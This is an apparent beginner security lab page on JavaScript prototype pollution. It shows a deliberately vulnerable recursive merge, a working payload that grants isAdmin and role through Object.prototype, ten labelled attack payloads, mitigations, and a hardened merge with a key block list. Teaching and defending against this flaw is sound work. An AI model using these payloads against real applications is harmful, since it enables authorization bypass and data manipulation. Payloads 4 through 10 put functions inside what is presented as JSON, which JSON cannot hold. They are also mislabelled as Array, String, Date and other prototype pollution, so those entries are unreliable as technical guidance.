Lab 1: Basic Prototype Pollution

Basic prototype pollution attacks

Difficulty: Low

Lab Overview

This lab demonstrates basic prototype pollution vulnerabilities where attackers can modify the prototype of base objects in JavaScript, leading to security issues like data manipulation and authentication bypass.

Objective: Understand how basic prototype pollution attacks work and how to exploit them.

Vulnerable Application
JSON Configuration Parser

This application processes JSON configuration data. Try to exploit prototype pollution vulnerabilities:

Prototype Pollution Tester
⚠️ Prototype Pollution Warning

This lab demonstrates basic prototype pollution vulnerabilities:

  • __proto__ - Direct prototype access
  • constructor - Constructor property access
  • prototype - Prototype property access
  • No validation - Missing input validation
Vulnerable Properties

These properties can be exploited for prototype pollution:

  • __proto__ - Direct prototype access
  • constructor - Constructor property access
  • prototype - Prototype property access
  • constructor.prototype - Nested prototype access
Prototype Pollution Demo
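This demonstrates how prototype pollution works in JavaScript. The merge has to be recursive and the input has to arrive through JSON.parse, where "__proto__" becomes an ordinary own key; in an object literal the same key would only set that literal's own prototype.

    // Vulnerable function: recursive merge that doesn't validate keys
    function merge(target, source) {
      for (let key in source) {
        if (Object.prototype.hasOwnProperty.call(source, key)) {
          if (typeof source[key] === "object" && source[key] !== null &&
              typeof target[key] === "object" && target[key] !== null) {
            // target["__proto__"] resolves to Object.prototype here
            merge(target[key], source[key]);
          } else {
            target[key] = source[key];
          }
        }
      }
      return target;
    }

    // Attacker input, as produced by parsing a JSON request body
    const maliciousInput = JSON.parse('{ "__proto__": { "isAdmin": true, "role": "admin" } }');

    // Vulnerable object
    const user = { name: "john" };

    // Pollution occurs here
    merge(user, maliciousInput);

    // Now all objects have polluted prototype
    console.log({}.isAdmin); // true
    console.log({}.role);    // "admin"

The demo above shows how prototype pollution can affect every object in the application that inherits from Object.prototype.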
Vulnerability Details
  • Type: Basic Prototype Pollution
  • Severity: Medium
  • Method: Direct prototype access
  • Issue: Missing input validation
Attack Vectors
  • __proto__ Access: Direct prototype modification
  • Constructor Access: Constructor property manipulation
  • Prototype Access: Prototype property manipulation
  • Nested Access: Deep prototype manipulation
Basic Prototype Pollution Examples

Use these techniques to exploit basic prototype pollution vulnerabilities:

1. Basic __proto__ Pollution:
{ "__proto__": { "isAdmin": true, "role": "admin", "permissions": ["read", "write", "delete"] } }
2. Constructor Pollution:
{ "constructor": { "prototype": { "isAdmin": true, "role": "admin" } } }
3. Nested Prototype Pollution:
{ "constructor": { "prototype": { "constructor": { "prototype": { "isAdmin": true } } } } }
4. Array Prototype Pollution:
{ "__proto__": { "push": function() { return "hacked"; }, "length": 999 } }
5. Function Prototype Pollution:
{ "__proto__": { "toString": function() { return "hacked"; }, "valueOf": function() { return 0; } } }
6. Object Prototype Pollution:
{ "__proto__": { "hasOwnProperty": function() { return true; }, "toString": function() { return "hacked"; } } }
7. Date Prototype Pollution:
{ "__proto__": { "getTime": function() { return 0; }, "toString": function() { return "hacked"; } } }
8. String Prototype Pollution:
{ "__proto__": { "charAt": function() { return "hacked"; }, "length": 999 } }
9. Number Prototype Pollution:
{ "__proto__": { "valueOf": function() { return 0; }, "toString": function() { return "hacked"; } } }
10. Boolean Prototype Pollution:
{ "__proto__": { "valueOf": function() { return true; }, "toString": function() { return "hacked"; } } }
Mitigation Strategies
  • Validate input to prevent prototype pollution
  • Use Object.create(null) for safe objects
  • Implement proper input sanitization
  • Use Object.freeze() to prevent modifications
  • Regular security testing and vulnerability assessments
  • Monitor for unusual object behavior
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Implement rate limiting and request validation
  • Educate developers about prototype pollution
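
A hardened counterpart to the vulnerable merge shown earlier, as an added example that is not part of the original lab: it combines the key validation and Object.create(null) items from the list above and reports what it rejected so the event can be logged. The names safeMerge, loadConfig and BLOCKED_KEYS are assumptions made for illustration, and the sample input is constructed.

```javascript
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(value) {
  if (value === null || typeof value !== "object") return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Recursively copies own enumerable keys from source into target, refusing
// any key that can reach a prototype. Returns the rejected key paths.
function safeMerge(target, source, path = "", rejected = []) {
  for (const key of Object.keys(source)) {
    const here = path ? `${path}.${key}` : key;
    if (BLOCKED_KEYS.has(key)) {
      rejected.push(here);
      continue;
    }
    const value = source[key];
    if (isPlainObject(value)) {
      // Descend only into own properties of target, never inherited ones.
      const own = Object.prototype.hasOwnProperty.call(target, key);
      const child = own && isPlainObject(target[key]) ? target[key] : Object.create(null);
      target[key] = child;
      safeMerge(child, value, here, rejected);
    } else {
      target[key] = value;
    }
  }
  return rejected;
}

// Constructed sample: benign settings plus keys shaped like payloads 1 and 2.
const SAMPLE_INPUT = '{"theme":"dark","limits":{"maxItems":10},' +
  '"__proto__":{"isAdmin":true},' +
  '"constructor":{"prototype":{"role":"admin"}}}';

function loadConfig(jsonText) {
  // A null-prototype target has no chain for a stray key to walk up.
  const config = Object.create(null);
  const rejected = safeMerge(config, JSON.parse(jsonText));
  return { config, rejected };
}

const result = loadConfig(SAMPLE_INPUT);
console.log(result.rejected);      // key paths that were refused
console.log({}.isAdmin, {}.role);  // Object.prototype is unchanged
```

A non-empty rejected list on a configuration endpoint is worth alerting on, since legitimate clients have no reason to send those keys.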